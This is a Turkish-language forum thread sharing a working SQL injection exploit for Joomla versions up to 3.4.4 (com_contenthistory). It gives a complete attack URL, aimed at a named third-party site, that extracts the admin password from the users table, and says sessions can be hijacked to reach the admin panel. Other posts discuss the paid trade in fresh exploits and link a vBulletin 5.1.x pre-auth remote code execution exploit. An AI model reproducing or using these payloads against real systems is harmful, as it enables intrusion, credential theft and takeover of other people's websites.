

Joomla 0Day Sql İnjection Exploit
-
joomla 3.4.4 versiyonuna kadar geçerli 3.4.5 de fix edildi
bu açık 3.4.4 e kadar olan com_contenthistory mudülü kurulumda gelen çekirdek modülüdür ayrıca sension bilgilerinide alarak şifresiz admin paneline giriş yapıla biliniyor o açıda 3.4.5 versiyonunda fix edildi kolay gelsin
http://huatoon.com/joomla/index.php?option=com_contenthistory&view=history&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(password))%20FROM%20jos_users%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)
-
paylaşım için teşekkürler...
gördüğüm kadarıyla pek bir site yok...
-
Pek bi site olsa sence verirmi :)) Bunlar ilk çıktığında o sitelerde ücretle satılıyor 1000 dolar 2000 dolar hatta 3500 dolara bir wordpress açığıda satılıyordu.
Güncel açığı kimse kimseye vermez :) Hele para verip almışsa verme ihtimali çok çok düşer.
-
yeni bir açık
Vbulletin 5.1.X unserialize 0day preauth RCE exploit
https://www.exploit-db.com/exploits/38629/
buradada eleman derlemiş:http://mukarramkhalid.com/exploit-vbulletin-5-1-x-preauth-remote-code-execution/
belki birinin işine yarar...
mrkps tarafından 09/Kas/15 22:30 tarihinde düzenlenmiştir